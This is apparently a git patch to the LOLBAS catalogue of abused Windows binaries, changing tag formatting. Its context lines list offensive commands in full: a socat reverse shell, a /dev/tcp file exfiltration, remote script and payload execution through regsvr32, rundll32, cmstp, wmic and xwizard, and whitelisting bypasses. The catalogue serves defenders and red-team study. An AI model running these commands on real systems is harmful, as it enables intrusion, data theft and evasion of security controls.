a63a2a80..0898d43f 100644 --- a/yml/OSBinaries/Presentationhost.yml +++ b/yml/OSBinaries/Presentationhost.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Tags: - - Execute: XBAP + - Execute: XBAP - Command: Presentationhost.exe https://example.com/payload Description: It will download a remote payload and place it in INetCache. Usecase: Downloads payload from remote server diff --git a/yml/OSBinaries/Provlaunch.yml b/yml/OSBinaries/Provlaunch.yml index 7f5b18b7..16d6a119 100644 --- a/yml/OSBinaries/Provlaunch.yml +++ b/yml/OSBinaries/Provlaunch.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows 10, Windows 11, Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022 Tags: - - Execute: CMD + - Execute: CMD Full_Path: - Path: c:\windows\system32\provlaunch.exe Detection: diff --git a/yml/OSBinaries/Regsvr32.yml b/yml/OSBinaries/Regsvr32.yml index 43dc039d..979d24dc 100644 --- a/yml/OSBinaries/Regsvr32.yml +++ b/yml/OSBinaries/Regsvr32.yml @@ -12,8 +12,8 @@ Commands: MitreID: T1218.010 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: SCT - - Execute: Remote + - Execute: SCT + - Execute: Remote - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll Description: Execute the specified local .SCT script with scrobj.dll. Usecase: Execute code from scriptlet, bypass Application whitelisting @@ -22,7 +22,7 @@ Commands: MitreID: T1218.010 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: SCT + - Execute: SCT - Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll Description: Execute the specified remote .SCT script with scrobj.dll. Usecase: Execute code from remote scriptlet, bypass Application whitelisting @@ -31,8 +31,8 @@ Commands: MitreID: T1218.010 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: SCT - - Execute: Remote + - Execute: SCT + - Execute: Remote - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll Description: Execute the specified local .SCT script with scrobj.dll. Usecase: Execute code from scriptlet, bypass Application whitelisting @@ -41,7 +41,7 @@ Commands: MitreID: T1218.010 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: SCT + - Execute: SCT Full_Path: - Path: C:\Windows\System32\regsvr32.exe - Path: C:\Windows\SysWOW64\regsvr32.exe diff --git a/yml/OSBinaries/Rundll32.yml b/yml/OSBinaries/Rundll32.yml index e1bb40c7..5d60b292 100644 --- a/yml/OSBinaries/Rundll32.yml +++ b/yml/OSBinaries/Rundll32.yml @@ -30,7 +30,7 @@ Commands: MitreID: T1218.011 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: JScript + - Execute: JScript - Command: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()"); Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe. Usecase: Proxy execution @@ -39,7 +39,7 @@ Commands: MitreID: T1218.011 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: JScript + - Execute: JScript - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);} Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started. Usecase: Proxy execution @@ -48,7 +48,7 @@ Commands: MitreID: T1218.011 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: JScript + - Execute: JScript - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test") Description: Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script. Usecase: Execute code from Internet @@ -57,7 +57,7 @@ Commands: MitreID: T1218.011 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: JScript + - Execute: JScript - Command: rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain Description: Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS). Usecase: Execute code from alternate data stream diff --git a/yml/OSBinaries/Runexehelper.yml b/yml/OSBinaries/Runexehelper.yml index 545b1c19..eafab600 100644 --- a/yml/OSBinaries/Runexehelper.yml +++ b/yml/OSBinaries/Runexehelper.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows 10, Windows 11, Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022 Tags: - - Execute: EXE + - Execute: EXE Full_Path: - Path: c:\windows\system32\runexehelper.exe Detection: diff --git a/yml/OSBinaries/Runonce.yml b/yml/OSBinaries/Runonce.yml index fb024752..40b17aaa 100644 --- a/yml/OSBinaries/Runonce.yml +++ b/yml/OSBinaries/Runonce.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: CMD + - Execute: CMD Full_Path: - Path: C:\Windows\System32\runonce.exe - Path: C:\Windows\SysWOW64\runonce.exe diff --git a/yml/OSBinaries/Runscripthelper.yml b/yml/OSBinaries/Runscripthelper.yml index 2e58c2ed..535aeff5 100644 --- a/yml/OSBinaries/Runscripthelper.yml +++ b/yml/OSBinaries/Runscripthelper.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Tags: - - Execute: Powershell + - Execute: Powershell Full_Path: - Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe - Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe diff --git a/yml/OSBinaries/Sc.yml b/yml/OSBinaries/Sc.yml index bd016f04..7766c069 100644 --- a/yml/OSBinaries/Sc.yml +++ b/yml/OSBinaries/Sc.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: EXE - Command: sc config binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" & sc start Description: Modifies an existing service and executes the file stored in the ADS. Usecase: Execute binary file hidden inside an alternate data stream @@ -21,7 +21,7 @@ Commands: MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: EXE Full_Path: - Path: C:\Windows\System32\sc.exe - Path: C:\Windows\SysWOW64\sc.exe diff --git a/yml/OSBinaries/Schtasks.yml b/yml/OSBinaries/Schtasks.yml index c37e48e0..82f9ab2b 100644 --- a/yml/OSBinaries/Schtasks.yml +++ b/yml/OSBinaries/Schtasks.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1053.005 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: EXE - Command: schtasks /create /s targetmachine /tn "MyTask" /tr c:\some\directory\notevil.exe /sc daily Description: Create a scheduled task on a remote computer for persistence/lateral movement Usecase: Create a remote task to run daily relative to the the time of creation @@ -21,7 +21,7 @@ Commands: MitreID: T1053.005 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: EXE Full_Path: - Path: c:\windows\system32\schtasks.exe - Path: c:\windows\syswow64\schtasks.exe diff --git a/yml/OSBinaries/Scriptrunner.yml b/yml/OSBinaries/Scriptrunner.yml index 4c5b1416..bd8b1189 100644 --- a/yml/OSBinaries/Scriptrunner.yml +++ b/yml/OSBinaries/Scriptrunner.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1202 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: EXE - Command: ScriptRunner.exe -appvscript "\\fileserver\calc.cmd" Description: Executes calc.cmd from remote server Usecase: Execute binary through proxy binary from external server to evade defensive counter measures @@ -21,8 +21,8 @@ Commands: MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: Remote - - Execute: CMD + - Execute: Remote + - Execute: CMD Full_Path: - Path: C:\Windows\System32\scriptrunner.exe - Path: C:\Windows\SysWOW64\scriptrunner.exe diff --git a/yml/OSBinaries/Setres.yml b/yml/OSBinaries/Setres.yml index 6797060b..4e4dd1da 100644 --- a/yml/OSBinaries/Setres.yml +++ b/yml/OSBinaries/Setres.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022 Tags: - - Execute: EXE + - Execute: EXE Full_Path: - Path: c:\windows\system32\setres.exe Detection: diff --git a/yml/OSBinaries/SettingSyncHost.yml b/yml/OSBinaries/SettingSyncHost.yml index 13fb36fa..2fbd1f63 100644 --- a/yml/OSBinaries/SettingSyncHost.yml +++ b/yml/OSBinaries/SettingSyncHost.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows 8, Windows 8.1, Windows 10 Tags: - - Execute: EXE + - Execute: EXE - Command: SettingSyncHost -LoadAndRunDiagScriptNoCab anything Description: Execute a batch script in the background (no window ever pops up) which can be subverted to running arbitrary programs by setting the current working directory to %TMP% and creating files such as reg.bat/reg.exe in that directory thereby causing them to execute instead of the ones in C:\Windows\System32. Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism. Additionally, effectively act as a -WindowStyle Hidden option (as there is in PowerShell) for any arbitrary batch file. @@ -21,7 +21,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows 8, Windows 8.1, Windows 10 Tags: - - Execute: EXE + - Execute: EXE Full_Path: - Path: C:\Windows\System32\SettingSyncHost.exe - Path: C:\Windows\SysWOW64\SettingSyncHost.exe diff --git a/yml/OSBinaries/Ssh.yml b/yml/OSBinaries/Ssh.yml index 6d651b18..27a9f125 100644 --- a/yml/OSBinaries/Ssh.yml +++ b/yml/OSBinaries/Ssh.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1202 OperatingSystem: Windows 10 1809, Windows Server 2019 Tags: - - Execute: EXE + - Execute: EXE - Command: ssh -o ProxyCommand=calc.exe . Description: Executes calc.exe from ssh.exe Usecase: Performs execution of specified file, can be used as a defensive evasion. @@ -21,7 +21,7 @@ Commands: MitreID: T1202 OperatingSystem: Windows 10 Tags: - - Execute: EXE + - Execute: EXE Full_Path: - Path: c:\windows\system32\OpenSSH\ssh.exe Detection: diff --git a/yml/OSBinaries/Stordiag.yml b/yml/OSBinaries/Stordiag.yml index aa42bf6a..8c62daf9 100644 --- a/yml/OSBinaries/Stordiag.yml +++ b/yml/OSBinaries/Stordiag.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows 10 Tags: - - Execute: EXE + - Execute: EXE - Command: stordiag.exe Description: Once executed, Stordiag.exe will execute schtasks.exe and powershell.exe - if stordiag.exe is copied to a folder and an arbitrary executable is renamed to one of these names, stordiag.exe will execute it. Usecase: Possible defence evasion purposes. @@ -21,7 +21,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows 11 Tags: - - Execute: EXE + - Execute: EXE Full_Path: - Path: c:\windows\system32\stordiag.exe - Path: c:\windows\syswow64\stordiag.exe diff --git a/yml/OSBinaries/Syncappvpublishingserver.yml b/yml/OSBinaries/Syncappvpublishingserver.yml index ec4e8b0a..3d0cdd57 100644 --- a/yml/OSBinaries/Syncappvpublishingserver.yml +++ b/yml/OSBinaries/Syncappvpublishingserver.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows 10 1709, Windows 10 1703, Windows 10 1607 Tags: - - Execute: Powershell + - Execute: Powershell Full_Path: - Path: C:\Windows\System32\SyncAppvPublishingServer.exe - Path: C:\Windows\SysWOW64\SyncAppvPublishingServer.exe diff --git a/yml/OSBinaries/Ttdinject.yml b/yml/OSBinaries/Ttdinject.yml index 42f0d664..145bd6fc 100644 --- a/yml/OSBinaries/Ttdinject.yml +++ b/yml/OSBinaries/Ttdinject.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows 10 2004 and above, Windows 11 Tags: - - Execute: EXE + - Execute: EXE - Command: ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /launch "C:/Windows/System32/calc.exe" Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated. Usecase: Spawn process using other binary @@ -21,7 +21,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows 10 1909 and below Tags: - - Execute: EXE + - Execute: EXE Full_Path: - Path: C:\Windows\System32\ttdinject.exe - Path: C:\Windows\Syswow64\ttdinject.exe diff --git a/yml/OSBinaries/Tttracer.yml b/yml/OSBinaries/Tttracer.yml index c12ae91f..7c51f382 100644 --- a/yml/OSBinaries/Tttracer.yml +++ b/yml/OSBinaries/Tttracer.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows 10 1809 and newer, Windows 11 Tags: - - Execute: EXE + - Execute: EXE - Command: TTTracer.exe -dumpFull -attach pid Description: Dumps process using tttracer.exe. Requires administrator privileges Usecase: Dump process by PID diff --git a/yml/OSBinaries/Unregmp2.yml b/yml/OSBinaries/Unregmp2.yml index fabfae40..541818d2 100644 --- a/yml/OSBinaries/Unregmp2.yml +++ b/yml/OSBinaries/Unregmp2.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1202 OperatingSystem: Windows 10 Tags: - - Execute: EXE + - Execute: EXE Full_Path: - Path: C:\Windows\System32\unregmp2.exe - Path: C:\Windows\SysWOW64\unregmp2.exe diff --git a/yml/OSBinaries/Verclsid.yml b/yml/OSBinaries/Verclsid.yml index 27511832..e42e6b74 100644 --- a/yml/OSBinaries/Verclsid.yml +++ b/yml/OSBinaries/Verclsid.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218.012 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: DLL + - Execute: DLL Full_Path: - Path: C:\Windows\System32\verclsid.exe - Path: C:\Windows\SysWOW64\verclsid.exe diff --git a/yml/OSBinaries/Wab.yml b/yml/OSBinaries/Wab.yml index c8e61fce..6fa837fe 100644 --- a/yml/OSBinaries/Wab.yml +++ b/yml/OSBinaries/Wab.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: DLL + - Execute: DLL Full_Path: - Path: C:\Program Files\Windows Mail\wab.exe - Path: C:\Program Files (x86)\Windows Mail\wab.exe diff --git a/yml/OSBinaries/Winget.yml b/yml/OSBinaries/Winget.yml index d6be4bc4..f914071f 100644 --- a/yml/OSBinaries/Winget.yml +++ b/yml/OSBinaries/Winget.yml @@ -12,8 +12,8 @@ Commands: MitreID: T1105 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: Remote - - Execute: EXE + - Execute: Remote + - Execute: EXE - Command: winget.exe install --accept-package-agreements -s msstore [name or ID] Description: 'Download and install any software from the Microsoft Store using its name or Store ID, even if the Microsoft Store App itself is blocked on the machine. For example, use "Sysinternals Suite" or `9p7knl5rwt25` for obtaining ProcDump, PsExec via the Sysinternals Suite. Note: a Microsoft account is required for this.' Usecase: Download and install software from Microsoft Store, even if Microsoft Store App is blocked diff --git a/yml/OSBinaries/Wlrmdr.yml b/yml/OSBinaries/Wlrmdr.yml index 10f96cce..913ce053 100644 --- a/yml/OSBinaries/Wlrmdr.yml +++ b/yml/OSBinaries/Wlrmdr.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1202 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: EXE Full_Path: - Path: c:\windows\system32\wlrmdr.exe Code_Sample: diff --git a/yml/OSBinaries/Wmic.yml b/yml/OSBinaries/Wmic.yml index 133c4a8c..49d52efc 100644 --- a/yml/OSBinaries/Wmic.yml +++ b/yml/OSBinaries/Wmic.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: EXE - Command: wmic.exe process call create calc Description: Execute calc from wmic Usecase: Execute binary from wmic to evade defensive counter measures @@ -21,7 +21,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: EXE - Command: wmic.exe /node:"192.168.0.1" process call create "evil.exe" Description: Execute evil.exe on the remote system. Usecase: Execute binary on a remote system @@ -30,8 +30,8 @@ Commands: MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: EXE - - Execute: Remote + - Execute: EXE + - Execute: Remote - Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl" Description: Create a volume shadow copy of NTDS.dit that can be copied. Usecase: Execute binary on remote system @@ -40,8 +40,8 @@ Commands: MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: XSL - - Execute: Remote + - Execute: XSL + - Execute: Remote - Command: wmic.exe process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl" Description: Executes JScript or VBScript embedded in the target remote XSL stylsheet. Usecase: Execute script from remote system diff --git a/yml/OSBinaries/WorkFolders.yml b/yml/OSBinaries/WorkFolders.yml index 6287b770..d2dd19a8 100644 --- a/yml/OSBinaries/WorkFolders.yml +++ b/yml/OSBinaries/WorkFolders.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: EXE Full_Path: - Path: C:\Windows\System32\WorkFolders.exe Detection: diff --git a/yml/OSBinaries/Xwizard.yml b/yml/OSBinaries/Xwizard.yml index 87076e3b..e7d9b930 100644 --- a/yml/OSBinaries/Xwizard.yml +++ b/yml/OSBinaries/Xwizard.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: DLL + - Execute: DLL - Command: xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC} Description: Xwizard.exe running a custom class that has been added to the registry. The /t and /u switch prevent an error message in later Windows 10 builds. Usecase: Run a com object created in registry to evade defensive counter measures @@ -21,7 +21,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: DLL + - Execute: DLL - Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to INetCache. Usecase: Download file from Internet diff --git a/yml/OSBinaries/msedge_proxy.yml b/yml/OSBinaries/msedge_proxy.yml index 8da75b12..b6204bf0 100644 --- a/yml/OSBinaries/msedge_proxy.yml +++ b/yml/OSBinaries/msedge_proxy.yml @@ -28,7 +28,7 @@ Commands: MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: CMD + - Execute: CMD Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_susp_electron_execution_proxy.yml Acknowledgement: diff --git a/yml/OSBinaries/msedgewebview2.yml b/yml/OSBinaries/msedgewebview2.yml index c89260d1..e9ce1bd5 100644 --- a/yml/OSBinaries/msedgewebview2.yml +++ b/yml/OSBinaries/msedgewebview2.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: EXE - Command: msedgewebview2.exe --utility-cmd-prefix="calc.exe" Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess. Usecase: Proxy execution of binary @@ -21,7 +21,7 @@ Commands: MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: EXE - Command: msedgewebview2.exe --disable-gpu-sandbox --gpu-launcher="calc.exe" Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess. Usecase: Proxy execution of binary @@ -30,7 +30,7 @@ Commands: MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: EXE - Command: msedgewebview2.exe --no-sandbox --renderer-cmd-prefix="calc.exe" Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess. Usecase: Proxy execution of binary @@ -39,7 +39,7 @@ Commands: MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: EXE Full_Path: - Path: C:\Program Files (x86)\Microsoft\Edge\Application\114.0.1823.43\msedgewebview2.exe Detection: diff --git a/yml/OSBinaries/wt.yml b/yml/OSBinaries/wt.yml index 13b34e44..a96fe54f 100644 --- a/yml/OSBinaries/wt.yml +++ b/yml/OSBinaries/wt.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1202 OperatingSystem: Windows 11 Tags: - - Execute: EXE + - Execute: EXE Full_Path: - Path: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_\wt.exe Detection: From e07907c473442199d60d4e6a73c7a63cef3f00d8 Mon Sep 17 00:00:00 2001 From: Hegusung Date: Sun, 13 Oct 2024 18:01:58 +0200 Subject: [PATCH 076/148] Removed Fixed and Custom Format tags --- yml/OSBinaries/Addinutil.yml | 1 - yml/OSBinaries/At.yml | 1 - yml/OSBinaries/Atbroker.yml | 1 - yml/OSBinaries/Bash.yml | 4 ---- yml/OSBinaries/Certoc.yml | 1 - yml/OSBinaries/Cmstp.yml | 2 -- yml/OSBinaries/Conhost.yml | 2 -- yml/OSBinaries/Control.yml | 2 -- yml/OSBinaries/Cscript.yml | 1 - yml/OSBinaries/CustomShellHost.yml | 1 - yml/OSBinaries/Dfsvc.yml | 1 - yml/OSBinaries/Diskshadow.yml | 2 -- yml/OSBinaries/Dnscmd.yml | 1 - yml/OSBinaries/Esentutl.yml | 1 - yml/OSBinaries/Explorer.yml | 2 -- yml/OSBinaries/Extexport.yml | 1 - yml/OSBinaries/Forfiles.yml | 2 -- yml/OSBinaries/Fsutil.yml | 1 - yml/OSBinaries/Ftp.yml | 1 - yml/OSBinaries/Gpscript.yml | 2 -- yml/OSBinaries/Hh.yml | 2 -- yml/OSBinaries/Ie4uinit.yml | 1 - yml/OSBinaries/Iediagcmd.yml | 1 - yml/OSBinaries/Ieexec.yml | 2 -- yml/OSBinaries/Infdefaultinstall.yml | 1 - yml/OSBinaries/Installutil.yml | 2 -- yml/OSBinaries/Mavinject.yml | 2 -- yml/OSBinaries/Microsoft.Workflow.Compiler.yml | 3 --- yml/OSBinaries/Mmc.yml | 1 - yml/OSBinaries/Msbuild.yml | 5 ----- yml/OSBinaries/Msconfig.yml | 1 - yml/OSBinaries/Msdt.yml | 3 --- yml/OSBinaries/Msedge.yml | 1 - yml/OSBinaries/Mshta.yml | 1 - yml/OSBinaries/Msiexec.yml | 5 ----- 35 files changed, 61 deletions(-) diff --git a/yml/OSBinaries/Addinutil.yml b/yml/OSBinaries/Addinutil.yml index 7f188467..7ff31457 100644 --- a/yml/OSBinaries/Addinutil.yml +++ b/yml/OSBinaries/Addinutil.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: .NetObjets - - Input: Fixed Format Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddinUtil.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddinUtil.exe diff --git a/yml/OSBinaries/At.yml b/yml/OSBinaries/At.yml index 2c1c1ed7..12397727 100644 --- a/yml/OSBinaries/At.yml +++ b/yml/OSBinaries/At.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows 7 or older Tags: - Execute: EXE - - Input: Custom Format Full_Path: - Path: C:\WINDOWS\System32\At.exe - Path: C:\WINDOWS\SysWOW64\At.exe diff --git a/yml/OSBinaries/Atbroker.yml b/yml/OSBinaries/Atbroker.yml index 99c1efbc..d8f50647 100644 --- a/yml/OSBinaries/Atbroker.yml +++ b/yml/OSBinaries/Atbroker.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: EXE - - Input: Custom Format Full_Path: - Path: C:\Windows\System32\Atbroker.exe - Path: C:\Windows\SysWOW64\Atbroker.exe diff --git a/yml/OSBinaries/Bash.yml b/yml/OSBinaries/Bash.yml index 87d29639..ec33fe02 100644 --- a/yml/OSBinaries/Bash.yml +++ b/yml/OSBinaries/Bash.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows 10 Tags: - Execute: CMD - - Input: Custom Format - Command: bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane" Description: Executes a reverseshell Usecase: Performs execution of specified file, can be used as a defensive evasion. @@ -23,7 +22,6 @@ Commands: OperatingSystem: Windows 10 Tags: - Execute: CMD - - Input: Custom Format - Command: bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24' Description: Exfiltrate data Usecase: Performs execution of specified file, can be used as a defensive evasion. @@ -33,7 +31,6 @@ Commands: OperatingSystem: Windows 10 Tags: - Execute: CMD - - Input: Custom Format - Command: bash.exe -c calc.exe Description: Executes calc.exe from bash.exe Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting. @@ -43,7 +40,6 @@ Commands: OperatingSystem: Windows 10 Tags: - Execute: CMD - - Input: Custom Format Full_Path: - Path: C:\Windows\System32\bash.exe - Path: C:\Windows\SysWOW64\bash.exe diff --git a/yml/OSBinaries/Certoc.yml b/yml/OSBinaries/Certoc.yml index 1698354f..34b5c3f5 100644 --- a/yml/OSBinaries/Certoc.yml +++ b/yml/OSBinaries/Certoc.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows Server 2022 Tags: - Execute: DLL - - Input: Custom Format - Command: certoc.exe -GetCACAPS https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-DllInjection.ps1 Description: Downloads text formatted files Usecase: Download scripts, webshells etc. diff --git a/yml/OSBinaries/Cmstp.yml b/yml/OSBinaries/Cmstp.yml index 3a91d247..bccde852 100644 --- a/yml/OSBinaries/Cmstp.yml +++ b/yml/OSBinaries/Cmstp.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: INF - - Input: Custom Format - Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. Usecase: Execute code hidden within an inf file. Execute code directly from Internet. @@ -23,7 +22,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Tags: - Execute: INF - - Input: Custom Format Full_Path: - Path: C:\Windows\System32\cmstp.exe - Path: C:\Windows\SysWOW64\cmstp.exe diff --git a/yml/OSBinaries/Conhost.yml b/yml/OSBinaries/Conhost.yml index c0b49723..3dca837f 100644 --- a/yml/OSBinaries/Conhost.yml +++ b/yml/OSBinaries/Conhost.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - - Input: Custom Format - Command: "conhost.exe --headless calc.exe" Description: Execute calc.exe with conhost.exe as parent process Usecase: Specify --headless parameter to hide child process window (if applicable) @@ -23,7 +22,6 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - - Input: Custom Format Full_Path: - Path: c:\windows\system32\conhost.exe Detection: diff --git a/yml/OSBinaries/Control.yml b/yml/OSBinaries/Control.yml index a9b8c99d..a4864587 100644 --- a/yml/OSBinaries/Control.yml +++ b/yml/OSBinaries/Control.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL - - Input: Custom Format - Command: control.exe c:\windows\tasks\evil.cpl Description: Execute evil.cpl payload. A CPL is a DLL file with CPlApplet export function) Usecase: Use to execute code and bypass application whitelisting @@ -23,7 +22,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL - - Input: Custom 